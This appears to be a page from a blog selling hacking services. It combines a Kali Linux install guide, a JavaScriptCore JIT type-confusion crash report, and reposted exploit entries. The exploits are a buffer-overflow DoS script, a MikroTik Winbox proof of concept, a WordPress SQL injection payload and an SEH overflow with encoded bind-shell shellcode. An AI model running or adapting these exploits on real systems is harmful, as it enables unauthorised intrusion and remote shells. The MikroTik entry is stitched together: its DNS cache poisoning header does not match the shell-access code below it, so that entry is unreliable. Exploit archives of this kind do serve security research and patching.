Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863595021

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

In the previous article, I also wrote about the installation of kali. Over time, Kali's update is also faster. Here we take the latest version as an example to perform an installation demonstration.

Configure virtual machine

Here we take the latest vm17.5 as an example. Configure the virtual machine.创建新的虚拟机

自定义

直接下一步 选择稍后安装操作系统

Because kali is based on in-depth development of debian, we just need to choose debian here. Unbunt is OK.debian64位

You must choose the location here, and do not place it on disk C. Over time, it takes up a lot of space in disk C 虚拟机名字和位置 CPU数量 根据你电脑性能选择 配置内存 根据你电脑性能自行配置 网络类型为桥接

The remaining few items are all right next.gwl0bl0nrub325.png

Setting up the disk space of kali is recommended to be above 50G. Because Kali will install a lot of tools later.1y5il10zyds326.png

Click Finish to save the virtual machine.idag5wp2naw328.png

Installing kali

Click Edit to specify the mirror file for the virtual machine.2w4a3ljwnpu329.png wc313l5gkue330.png

Click Graphical install to install.zeml2szhu5w332.png 选择语音为中文 选择位置 选择键盘 扫描磁盘 耐心等待 设置主机名 配置网络 默认

Set a normal username. After kali2020, the root account is no longer used as the default account.密码 设置时间

Next is the most important configuration disk. Just install Windows and partition the disk. Here, my cousin recommends using the entire disk directly 选择整个磁盘

选择磁盘

将所用文件放在同一分区 不要乱搞,不然安装会失败。 完成并写入磁盘 选择是 开始安装 时间较长 耐心等待

Select the program to be installed, the default is

rneyxtwp410355.png 会下载安装你选定的工具 和你网络有关 安装下载的工具 写入引导 选择分区 等待结束 结束后自动重启 效果 安装完成

Later events

Modify the root password because kali is logged in with ordinary users by default during installation. Many commands require root permissions. We need to set a password for the root account.

su root #switch root user

passwd root #Set the password of root not to display Chinese. We are in the settings. Although we have set Chinese, but after logging in to the system, we still find that it is still in English. This is because there is no Chinese font. We need to execute the following command.

apt-get install xfonts-intl-chinese

apt-get install ttf-wqy-microhei

echo LANG='zh_CN.UTF-8' /etc/default/locale general update system apt-get update

apt-get upgrade -y

#or

The difference between apt-get dist-upgrade -yupgrade and dist-upgrade is that the former retains the previous configuration of the software, while the latter covers the configuration.

Precautions

Don’t change the source! Don't change the source! Don't change the source! No special requirements, please do not log in with root. Installing php8.2 apache mysql by default does not require the installation of the web Three Musketeers. The ssh service is ready to be eaten with the service command, no configuration is required. No need to install vmtool, you can copy files directly with the host after the installation of kali

HireHackking 
The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):

    let notAGetterSetter = {whatever: 42};

    function v2(v5) {
        const v10 = Object();
        if (v5) {
            const v12 = {set:Array};
            const v14 = Object.defineProperty(v10,"length",v12);
            const v15 = (140899729)[140899729];
        } else {
            v10.length = notAGetterSetter;
        }
        const v18 = new Uint8ClampedArray(49415);
        v18[1] = v10;
        const v19 = v10.length;
        let v20 = 0;
        while (v20 < 100000) {
            v20++;
        }
    }
    const v26 = v2();
    for (let v32 = 0; v32 < 1000; v32++) {
        const v33 = v2(true);
    }

    /*
    Crashes with:
    ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info())
    ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *]
    1   0x1111ada79 WTFCrash
    2   0x1111ada99 WTFCrashWithSecurityImplication
    3   0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue)
    4   0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*)
    5   0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int)
    6   0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*)
    7   0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA()
    8   0x10ff9d647 JSC::DFG::CFAPhase::run()
    9   0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&)
    10  0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&)
    11  0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&)
    12  0x110279031 JSC::DFG::Plan::compileInThreadImpl()
    13  0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*)
    14  0x11052a9bb JSC::DFG::Worklist::ThreadBody::work()
    15  0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const
    16  0x1111b38a9 WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call()
    17  0x1102c433a WTF::Function<void ()>::operator()() const
    18  0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*)
    19  0x111285525 WTF::wtfThreadEntryPoint(void*)
    20  0x7fff5a7262eb _pthread_body
    21  0x7fff5a729249 _pthread_start
    22  0x7fff5a72540d thread_start
    */

The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows.

Below is my preliminary analysis of the cause of the bug.

The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it:

# Block 0 (before if-else):
  44: NewObject(...)
  <jump to block 1 or 2 depending on v5>

# Block 1 (the if part):
  ... <install .length property on @44>
  // Code for const v15 = (140899729)[140899729];
  ForceOSRExit
  Unreachable

# Block 2 (the else part)
  PutByOffset @44, notAGetterSetter
  PutStructure

# Block 3 (after the if-else):
  ...
  // Code for v10.length. Due to feedback from previous executions, DFG
  // JIT speculates that the if branch will be taken and that it will see
  // v10 with a GetterSetter for .length here
  CheckStructure @44, structureWithLengthBeingAGetterSetter
  166: GetGetterSetterByOffset @44, .length         // Load the GetterSetter object from @44
  167: GetGetter @166                               // Load the getter function from the GetterSetter
  ...


Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout.

Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]):

* It determines that the GetGetterSetterByOffset node loads the named property from the object @44
* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2)
    * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1
* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2).

At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that.



[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43
[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49
[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51
[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811
HireHackking 
# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
# Date: 2019-10-30
# Vendor Homepage:https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Exploit Author: Nithoshitha S
# Tested Version: v4.6.1217
# Tested on: Windows 7 x64
#            Windows XP SP3

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will see a crash.

# poc.py

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
HireHackking 
# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
# Date: 2019-10-30
# Exploit Author: Jacob Baines
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download
# Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below)
# Tested on: Various x86 and MIPSBE RouterOS installs
# CVE : CVE-2019-3978
# Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
# Disclosure: https://www.tenable.com/security/research/tra-2019-46

# Unauthenticated DNS request via Winbox
# RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests 
# to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up 
# a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978.

# This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8). 
# The PoC will always send a DNS request for example.com. In the following write up, 
# I detail how to use this to poison the routers cache:

# https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21

# Note that the writup focuses on router's configured *without* the DNS server enabled. 
# Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server.

## What are the build dependencies?
# This requires:

# * Boost 1.66 or higher
# * cmake

## How do I build this jawn?

# Just normal cmake. Try this:

# ```sh
# mkdir build
# cd build
# cmake ..
# make
# ```

# Resolve dependencies as needed.

## Usage Example

# ```sh
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
# -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
# <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
# ...
# [admin@MikroTik] > ip dns cache print
# Flags: S - static
# #   NAME                               ADDRESS                                                              TTL        
# 0   example.com                        93.184.216.34                                                        5h57m57s    
# [admin@MikroTik] >
# ```

# Source:
# https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request


/*
    Copyright 2019 Tenable, Inc.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                *

    Redistribution and use in source and binary forms, with or without modification,
    are permitted provided that the following conditions are met:

    1. Redistributions of source code must retain the above copyright notice, this
        list of conditions and the following disclaimer.

    2. Redistributions in binary form must reproduce the above copyright notice,
        this list of conditions and the following disclaimer in the documentation
        and/or other materials provided with the distribution.

    3. Neither the name of the copyright holder nor the names of its contributors
        may be used to endorse or promote products derived from this software
        without specific prior written permission.

    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
    POSSIBILITY OF SUCH DAMAGE.
*/
#include <fstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include <boost/algorithm/string.hpp>

#include "winbox_session.hpp"
#include "winbox_message.hpp"

namespace
{
    const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen";

    bool parseCommandLine(int p_argCount, const char* p_argArray[],
                          std::string& p_username, std::string& p_password,
                          std::string& p_ip, std::string& p_port)
    {
        boost::program_options::options_description description("options");
        description.add_options()
        ("help,h", "A list of command line options")
        ("version,v", "Display version information")
        ("username,u", boost::program_options::value<std::string>(), "The user to log in as")
        ("password", boost::program_options::value<std::string>(), "The password to log in with")
        ("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to")
        ("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to");

        boost::program_options::variables_map argv_map;
        try
        {
            boost::program_options::store(
                boost::program_options::parse_command_line(
                    p_argCount, p_argArray, description), argv_map);
        }
        catch (const std::exception& e)
        {
            std::cerr << e.what() << "\n" << std::endl;
            std::cerr << description << std::endl;
            return false;
        }

        boost::program_options::notify(argv_map);
        if (argv_map.empty() || argv_map.count("help"))
        {
            std::cerr << description << std::endl;
            return false;
        }

        if (argv_map.count("version"))
        {
            std::cerr << "Version: " << ::s_version << std::endl;
            return false;
        }

        if (argv_map.count("username") && argv_map.count("ip") &
            argv_map.count("port"))
        {
            p_username.assign(argv_map["username"].as<std::string>());
            p_ip.assign(argv_map["ip"].as<std::string>());
            p_port.assign(argv_map["port"].as<std::string>());

            if (argv_map.count("password"))
            {
                p_password.assign(argv_map["password"].as<std::string>());
            }
            else
            {
                p_password.assign("");
            }
            return true;
        }
        else
        {
            std::cerr << description << std::endl;
        }

        return false;
    }
}

int main(int p_argc, const char** p_argv)
{
    std::string username;
    std::string password;
    std::string ip;
    std::string port;
    if (!parseCommandLine(p_argc, p_argv, username, password, ip, port))
    {
        return EXIT_FAILURE;
    }
    Winbox_Session winboxSession(ip, port);
    if (!winboxSession.connect())
    {
        std::cerr << "Failed to connect to the remote host" << std::endl;
        return EXIT_FAILURE;
    }

    boost::uint32_t p_session_id = 0;
    if (!winboxSession.login(username, password, p_session_id))
    {
        std::cerr << "[-] Login failed." << std::endl;
        return false;
    }

    WinboxMessage msg;
    msg.set_to(0x4c);
    msg.set_command(0xa0065);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    msg.add_u32(5,80); // height
    msg.add_u32(6,24); // width
    msg.add_u32(8,1);  // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default...
    msg.add_string(0x0a, username); //username
    msg.add_string(1,"");
    msg.add_string(7, "vt102");
    msg.add_string(9, "-l a"); // drop into telnet client shell
    winboxSession.send(msg);

    msg.reset();
    if (!winboxSession.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return EXIT_FAILURE;
    }

    if (msg.has_error())
    {
        std::cout << "error: " << msg.get_error_string() << std::endl;
    }

    boost::uint32_t session_id = msg.get_u32(0xfe0001);

    msg.reset();
    msg.set_to(0x4c);
    msg.set_command(0xa0068);
    msg.set_request_id(2);
    msg.set_reply_expected(true);
    msg.add_u32(5,82);
    msg.add_u32(6,24);
    msg.add_u32(0xfe0001, session_id);
    winboxSession.send(msg);

    boost::uint32_t tracker = 0;
    msg.reset();
    if (!winboxSession.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return EXIT_FAILURE;
    }

    msg.reset();
    msg.set_to(0x4c);
    msg.set_command(0xa0067);
    msg.set_request_id(3);
    msg.set_reply_expected(true);
    msg.add_u32(3, tracker);
    msg.add_u32(0xfe0001, session_id);
    winboxSession.send(msg);

    msg.reset();
    if (!winboxSession.receive(msg))
    {
        std::cerr << "Error receiving a response." << std::endl;
        return EXIT_FAILURE;
    }

    if (msg.has_error())
    {
        std::cout << msg.serialize_to_json() << std::endl;
        std::cout << "error: " << msg.get_error_string() << std::endl;
        return EXIT_FAILURE;
    }
    else if (!msg.get_raw(0x02).empty())
    {
        std::string raw_payload(msg.get_raw(0x02));
        tracker += raw_payload.size();
    }

    //{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]}
    msg.reset();
    msg.set_to(0x4c);
    msg.set_command(0xa0067);
    msg.set_request_id(4);
    msg.set_reply_expected(true);
    msg.add_u32(3, tracker);
    msg.add_u32(0xfe0001, session_id);
    msg.add_raw(2, "set tracefile /pckg/option\n");
    winboxSession.send(msg);

    bool found_telnet_prompt = false;
    while (!found_telnet_prompt)
    {
        msg.reset();
        if (!winboxSession.receive(msg))
        {
            std::cerr << "Error receiving a response." << std::endl;
            return EXIT_FAILURE;
        }

        if (msg.has_error())
        {
            std::cout << msg.serialize_to_json() << std::endl;
            std::cout << "error: " << msg.get_error_string() << std::endl;
            return EXIT_FAILURE;
        }
        else if (!msg.get_raw(0x02).empty())
        {
            std::string raw_payload(msg.get_raw(0x02));
            if (raw_payload.find("telnet> ") != std::string::npos)
            {
                std::cout << "Success!" << std::endl;
                found_telnet_prompt = true;
            }
        }
    }

    return EXIT_SUCCESS;
}
HireHackking 
# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward
HireHackking 
# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)
# Google Dork: N/A
# Date: 2019-10-30
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage:https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Version: v4.6.1217
# Tested on: Windows XP SP3
# CVE : N/A
# Reference from : [1] https://www.exploit-db.com/exploits/47563        

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will get a bind shell on port 4444

#msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b '\x00' -f hex
#We need to create meaningful characters when pasting into the password on the application (allow characters include:\x21->\x7E in ASCII TABLE)
shellcode = (
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x2A\x52\x25\x2D\x53\x2A\x52\x25\x2D\x55\x2A\x52\x25\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x34\x4D\x68\x2D\x23\x34\x4D\x68\x2D\x24\x36\x4D\x69\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x5C\x30\x75\x2D\x62\x5C\x30\x75\x2D\x62\x5E\x31\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x73\x71\x3B\x2D\x60\x73\x71\x3B\x2D\x61\x75\x73\x3D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x39\x6F\x40\x2D\x4B\x39\x6F\x40\x2D\x4C\x39\x70\x40\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x47\x44\x27\x2D\x62\x47\x44\x27\x2D\x63\x47\x45\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x36\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x6A\x28\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x47\x21\x25\x28\x2D\x47\x21\x25\x28\x2D\x49\x22\x27\x29\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x56\x34\x3C\x2D\x44\x56\x34\x3C\x2D\x45\x58\x35\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x57\x31\x33\x44\x2D\x57\x31\x33\x44\x2D\x58\x32\x34\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x6E\x4F\x50\x2D\x3C\x6E\x4F\x50\x2D\x3E\x70\x50\x52\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x38\x33\x5F\x2D\x3F\x38\x33\x5F\x2D\x40\x39\x33\x60\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x4D\x38\x22\x2D\x6F\x4D\x38\x22\x2D\x6F\x4F\x3A\x24\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x72\x56\x55\x2D\x62\x72\x56\x55\x2D\x63\x74\x58\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x66\x52\x53\x2D\x4B\x66\x52\x53\x2D\x4C\x67\x52\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3B\x22\x35\x71\x2D\x3B\x22\x35\x71\x2D\x3C\x22\x37\x72\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x4F\x64\x55\x2D\x2E\x4F\x64\x55\x2D\x2E\x51\x65\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x48\x59\x5A\x2D\x59\x48\x59\x5A\x2D\x5B\x4A\x59\x5B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x62\x5C\x5A\x2D\x49\x62\x5C\x5A\x2D\x4A\x64\x5C\x5C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x63\x54\x2A\x47\x2D\x63\x54\x2A\x47\x2D\x65\x55\x2A\x47\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x4D\x4D\x43\x2D\x48\x4D\x4D\x43\x2D\x49\x4F\x4E\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x75\x60\x3A\x2D\x30\x75\x60\x3A\x2D\x32\x75\x60\x3A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x6B\x3F\x52\x2D\x60\x6B\x3F\x52\x2D\x60\x6D\x40\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x47\x21\x58\x2D\x3F\x47\x21\x58\x2D\x3F\x49\x22\x58\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x27\x4C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3E\x35\x60\x46\x2D\x3E\x35\x60\x46\x2D\x3E\x37\x60\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x2E\x2D\x41\x2D\x45\x2E\x2D\x41\x2D\x45\x30\x2E\x42\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6C\x4B\x74\x4C\x2D\x6C\x4B\x74\x4C\x2D\x6E\x4C\x74\x4C\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x42\x43\x29\x26\x2D\x42\x43\x29\x26\x2D\x43\x43\x2A\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x61\x43\x34\x2D\x2F\x61\x43\x34\x2D\x31\x61\x45\x34\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x58\x4B\x69\x2D\x50\x58\x4B\x69\x2D\x52\x59\x4D\x6A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x29\x29\x39\x2D\x71\x29\x29\x39\x2D\x73\x2B\x2A\x39\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x68\x52\x6D\x2D\x54\x68\x52\x6D\x2D\x55\x68\x52\x6D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x3C\x5B\x64\x2D\x20\x3C\x5B\x64\x2D\x21\x3E\x5B\x66\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x58\x6E\x65\x6B\x2D\x58\x6E\x65\x6B\x2D\x5A\x6F\x67\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x26\x52\x23\x2D\x69\x26\x52\x23\x2D\x69\x27\x54\x25\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x46\x3F\x27\x71\x2D\x46\x3F\x27\x71\x2D\x48\x40\x29\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x24\x52\x54\x2D\x3C\x24\x52\x54\x2D\x3E\x26\x54\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x40\x4F\x55\x2D\x5C\x40\x4F\x55\x2D\x5D\x40\x51\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x34\x59\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x40\x5C\x5E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x4D\x6A\x3B\x2D\x49\x4D\x6A\x3B\x2D\x4A\x4F\x6C\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x23\x6B\x3D\x2D\x62\x23\x6B\x3D\x2D\x63\x23\x6B\x3F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x6A\x57\x67\x2D\x23\x6A\x57\x67\x2D\x24\x6C\x57\x67\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x43\x60\x50\x2D\x23\x43\x60\x50\x2D\x25\x43\x60\x50\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x33\x34\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x56\x63\x59\x2D\x38\x56\x63\x59\x2D\x39\x56\x65\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x52\x60\x66\x2D\x40\x52\x60\x66\x2D\x41\x53\x61\x67\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x24\x61\x73\x2A\x2D\x24\x61\x73\x2A\x2D\x26\x61\x75\x2A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x34\x53\x66\x2D\x48\x34\x53\x66\x2D\x48\x34\x54\x68\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x26\x57\x26\x2D\x3C\x26\x57\x26\x2D\x3C\x27\x58\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x26\x26\x2F\x50\x2D\x26\x26\x2F\x50\x2D\x27\x27\x2F\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x52\x2E\x62\x2D\x30\x52\x2E\x62\x2D\x30\x54\x30\x63\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x5A\x75\x73\x2D\x31\x5A\x75\x73\x2D\x32\x5B\x75\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x41\x66\x56\x2D\x36\x41\x66\x56\x2D\x36\x42\x68\x57\x50"
